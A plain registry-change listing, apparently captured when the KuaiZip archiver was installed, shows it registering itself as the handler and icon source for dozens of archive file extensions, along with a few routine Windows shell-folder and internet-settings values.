"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.08]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.062]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\TreePanel]
"Hiden" = "0"
[HKCR\KuaiZip.033\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.mou]
"(Default)" = "KuaiZip.mou"
[HKCR\KuaiZip.051\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.02\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.062]
"set" = "1"
[HKCR\.088]
"(Default)" = "KuaiZip.088"
[HKCR\KuaiZip.rar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.07\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.014\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.073]
"set" = "1"
[HKCR\KuaiZip.7z\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,3"
[HKCR\KuaiZip.098\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.070\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.075]
"(Default)" = "NoAssociate.KZ"
[HKCR\.044]
"(Default)" = "KuaiZip.044"
[HKCR\KuaiZip.014\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.072]
"set" = "1"
[HKCR\KuaiZip.039\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.gz]
"(Default)" = "KuaiZip.gz"
[HKCR\KuaiZip.050\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.098]
"set" = "1"
[HKCR\KuaiZip.088]
"(Default)" = "快压 088 压缩文件"
[HKCR\KuaiZip.057]
"(Default)" = "快压 057 压缩文件"
[HKCR\KuaiZip.061]
"(Default)" = "快压 061 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.029]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.065]
"set" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\.08]
"(Default)" = "KuaiZip.08"
[HKCR\.033]
"(Default)" = "KuaiZip.033"
[HKCR\.tgz]
"(Default)" = "KuaiZip.tgz"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\KuaiZip.rpm\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.078]
"(Default)" = "KuaiZip.078"
[HKCR\KuaiZip.091]
"(Default)" = "快压 091 压缩文件"
[HKCR\KuaiZip.068\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.09\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.049]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.008]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.05\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.065]
"(Default)" = "KuaiZip.065"
[HKCR\.063]
"(Default)" = "KuaiZip.063"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.079]
"set" = "1"
[HKCR\KuaiZip.092]
"(Default)" = "快压 092 压缩文件"
[HKCR\KuaiZip.040]
"(Default)" = "快压 040 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.rar]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.tar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.029]
"(Default)" = "快压 029 压缩文件"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.rar]
"set" = "1"
[HKCR\KuaiZip.080]
"(Default)" = "快压 080 压缩文件"
[HKCR\KuaiZip.024\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.jar]
"(Default)" = "jarfile"
[HKCR\KuaiZip.076\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.096]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.013]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.044\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.022]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.097]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.027]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.04]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.035]
"(Default)" = "快压 035 压缩文件"
[HKCR\KuaiZip.081\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.062\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.050]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.099\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.029\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.024\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.070]
"(Default)" = "快压 070 压缩文件"
[HKCR\.zip]
"(Default)" = "KuaiZip.zip"
[HKCR\KuaiZip.082]
"(Default)" = "快压 082 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.090]
"(Default)" = "NoAssociate.KZ"
[HKCR\.084]
"(Default)" = "KuaiZip.084"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.011]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.001]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.057]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.08\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.079\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.007]
"set" = "1"
[HKCR\KuaiZip.087\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.043]
"(Default)" = "KuaiZip.043"
[HKCR\KuaiZip.09\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.z]
"(Default)" = "快压 Z 压缩文件"
[HKCR\.045]
"(Default)" = "KuaiZip.045"
[HKCR\KuaiZip.030]
"(Default)" = "快压 030 压缩文件"
[HKCR\KuaiZip.076\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.078]
"(Default)" = "快压 078 压缩文件"
[HKCR\KuaiZip.026]
"(Default)" = "快压 026 压缩文件"
[HKCR\KuaiZip.7z\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.005\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.077]
"(Default)" = "快压 077 压缩文件"
[HKCR\KuaiZip.062]
"(Default)" = "快压 062 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.076]
"set" = "1"
[HKCR\.036]
"(Default)" = "KuaiZip.036"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.045]
"set" = "1"
[HKCR\KuaiZip.036\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.081]
"set" = "1"
[HKCR\KuaiZip.007\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.066]
"(Default)" = "快压 066 压缩文件"
[HKCR\KuaiZip.089\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.001]
"(Default)" = "快压 001 压缩文件"
[HKCR\KuaiZip.051\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.rpm]
"set" = "1"
[HKCR\KuaiZip.008\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.081]
"(Default)" = "快压 081 压缩文件"
[HKCR\KuaiZip.05]
"(Default)" = "快压 05 压缩文件"
[HKCR\.011]
"(Default)" = "KuaiZip.011"
[HKCR\KuaiZip.027\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.013]
"(Default)" = "快压 013 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.031]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.039\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.zip\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.059\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.021\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.07]
"set" = "1"
[HKCR\KuaiZip.cab]
"(Default)" = "快压 CAB 压缩文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCR\KuaiZip.003\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.054\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.069\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.tgz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.068]
"(Default)" = "快压 068 压缩文件"
[HKCR\.005]
"(Default)" = "KuaiZip.005"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.052]
"set" = "1"
[HKCR\KuaiZip.056]
"(Default)" = "快压 056 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.077]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.058]
"set" = "1"
[HKCR\.081]
"(Default)" = "KuaiZip.081"
[HKCR\KuaiZip.06]
"(Default)" = "快压 06 压缩文件"
[HKCR\KuaiZip.mou\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.031\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.031]
"set" = "1"
[HKCR\.bz2]
"(Default)" = "KuaiZip.bz2"
[HKCR\.069]
"(Default)" = "KuaiZip.069"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.033]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.034]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.066]
"set" = "1"
[HKCR\.029]
"(Default)" = "KuaiZip.029"
[HKCR\KuaiZip.070\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.015]
"(Default)" = "快压 015 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.033]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.051]
"(Default)" = "快压 051 压缩文件"
[HKCR\.05]
"(Default)" = "KuaiZip.05"
[HKCR\.rpm]
"(Default)" = "KuaiZip.rpm"
[HKCR\KuaiZip_FileAsso.Origin\.036]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.088]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.tbz]
"set" = "1"
[HKCR\KuaiZip.097\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.018\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.070]
"set" = "1"
[HKCR\KuaiZip.088\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.072\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.086]
"(Default)" = "快压 086 压缩文件"
[HKCR\KuaiZip.lzh\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.008\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.026\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.016\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.039]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.070]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.028]
"set" = "1"
[HKCR\.04]
"(Default)" = "KuaiZip.04"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.084]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.026]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.041]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.017\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.052]
"(Default)" = "KuaiZip.052"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.071]
"set" = "1"
[HKCR\KuaiZip.012]
"(Default)" = "快压 012 压缩文件"
[HKCR\.082]
"(Default)" = "KuaiZip.082"
[HKCR\KuaiZip.095\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.095]
"(Default)" = "快压 095 压缩文件"
[HKCR\KuaiZip.072\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.094]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.016]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.094\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.lzh\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.006\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.080\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.043\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.054]
"(Default)" = "KuaiZip.054"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.gzip]
"set" = "1"
[HKCR\KuaiZip.075\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.052\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.015\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.071]
"(Default)" = "KuaiZip.071"
[HKCR\KuaiZip.029\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.7z]
"set" = "1"
[HKCR\KuaiZip.rar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,4"
[HKCR\KuaiZip.086\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.mou]
"(Default)" = "快压 MOU 压缩文件"
[HKCR\.053]
"(Default)" = "KuaiZip.053"
[HKCR\KuaiZip.064\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.09]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.049]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.045]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.009]
"set" = "1"
[HKCR\KuaiZip.rpm]
"(Default)" = "快压 RPM 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.087]
"set" = "1"
[HKCR\KuaiZip.07\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.065]
"(Default)" = "快压 065 压缩文件"
[HKCR\KuaiZip.063]
"(Default)" = "快压 063 压缩文件"
[HKCR\KuaiZip.tgz]
"(Default)" = "快压 TGZ 压缩文件"
[HKCR\.7z]
"(Default)" = "KuaiZip.7z"
[HKCR\.arj]
"(Default)" = "KuaiZip.arj"
[HKCR\KuaiZip.002\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.034\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.rpm]
"(Default)" = "NoAssociate.KZ"
[HKCR\.026]
"(Default)" = "KuaiZip.026"
[HKCR\KuaiZip.045\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.jar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.rar]
"(Default)" = "KuaiZip.rar"
[HKCR\KuaiZip_FileAsso.Origin\.006]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.056]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.01\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\KuaiZip_FileAsso.Origin\.067]
"(Default)" = "NoAssociate.KZ"
[HKCR\.034]
"(Default)" = "KuaiZip.034"
[HKCR\KuaiZip.092\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.tbz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.085\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.095]
"set" = "1"
[HKCR\KuaiZip.045\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.040]
"set" = "1"
[HKCR\KuaiZip.042]
"(Default)" = "快压 042 压缩文件"
[HKCR\.003]
"(Default)" = "KuaiZip.003"
[HKCR\KuaiZip.097\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.025\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.032]
"(Default)" = "KuaiZip.032"
[HKCR\KuaiZip.060\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.zip]
"(Default)" = "CompressedFolder"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.068]
"set" = "1"
[HKCR\KuaiZip.062\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.056]
"(Default)" = "KuaiZip.056"
[HKCR\.025]
"(Default)" = "KuaiZip.025"
[HKCR\KuaiZip_FileAsso.Origin\.z]
"(Default)" = ""
[HKCU\Software\KuaiZip\KuaiZip\Setup\.078]
"set" = "1"
[HKCR\.035]
"(Default)" = "KuaiZip.035"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.042]
"set" = "1"
[HKCR\KuaiZip.07]
"(Default)" = "快压 07 压缩文件"
[HKCR\KuaiZip.025\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.010]
"(Default)" = "快压 010 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.063]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.068\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.046]
"(Default)" = "快压 046 压缩文件"
[HKCR\.068]
"(Default)" = "KuaiZip.068"
[HKCR\KuaiZip.096\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.075]
"(Default)" = "快压 075 压缩文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\KuaiZip.tbz]
"(Default)" = "快压 TBZ 压缩文件"
[HKCR\KuaiZip.098]
"(Default)" = "快压 098 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.023]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.053]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.010\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.7z]
"(Default)" = "快压 7Z 压缩文件"
[HKCR\.012]
"(Default)" = "KuaiZip.012"
[HKCR\KuaiZip.03\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.081]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.099\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.064]
"(Default)" = "KuaiZip.064"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.024]
"set" = "1"
[HKCR\KuaiZip.003]
"(Default)" = "快压 003 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.036]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.071]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.094]
"set" = "1"
[HKCR\KuaiZip.084\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.037\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.034]
"(Default)" = "快压 034 压缩文件"
[HKCR\KuaiZip.023\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.039]
"(Default)" = "快压 039 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.069]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.099]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.064]
"set" = "1"
[HKCR\KuaiZip.064\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.089\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.01\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 D6 92 51 37 AA E4 B9 00 AE 2F D2 3A 2D F8 45"
[HKCR\KuaiZip.gzip\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.019\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\.jar]
"(Default)" = "KuaiZip.jar"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.082]
"set" = "1"
[HKCR\.tbz]
"(Default)" = "KuaiZip.tbz"
[HKCR\KuaiZip_FileAsso.Origin\.001]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.089]
"set" = "1"
[HKCR\KuaiZip.cab\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.091]
"(Default)" = "NoAssociate.KZ"
[HKCR\.070]
"(Default)" = "KuaiZip.070"
[HKCR\KuaiZip.010\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.tbz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.041\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.048]
"(Default)" = "NoAssociate.KZ"
[HKCR\.030]
"(Default)" = "KuaiZip.030"
[HKCR\KuaiZip.031]
"(Default)" = "快压 031 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.043]
"(Default)" = "NoAssociate.KZ"
[HKCR\.006]
"(Default)" = "KuaiZip.006"
[HKCR\KuaiZip.047\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.054]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.005]
"(Default)" = "NoAssociate.KZ"
[HKCR\.098]
"(Default)" = "KuaiZip.098"
[HKCR\KuaiZip_FileAsso.Origin\.009]
"(Default)" = "NoAssociate.KZ"
[HKCR\.057]
"(Default)" = "KuaiZip.057"
[HKCR\KuaiZip.020]
"(Default)" = "快压 020 压缩文件"
[HKCR\KuaiZip.053]
"(Default)" = "快压 053 压缩文件"
[HKCR\KuaiZip.072]
"(Default)" = "快压 072 压缩文件"
[HKCR\KuaiZip.042\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.079]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.083\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.063]
"set" = "1"
[HKCR\KuaiZip.035\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.073\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.02]
"(Default)" = "快压 02 压缩文件"
[HKCR\KuaiZip.056\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.021\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.rar]
"(Default)" = "快压 RAR 压缩文件"
[HKCR\.004]
"(Default)" = "KuaiZip.004"
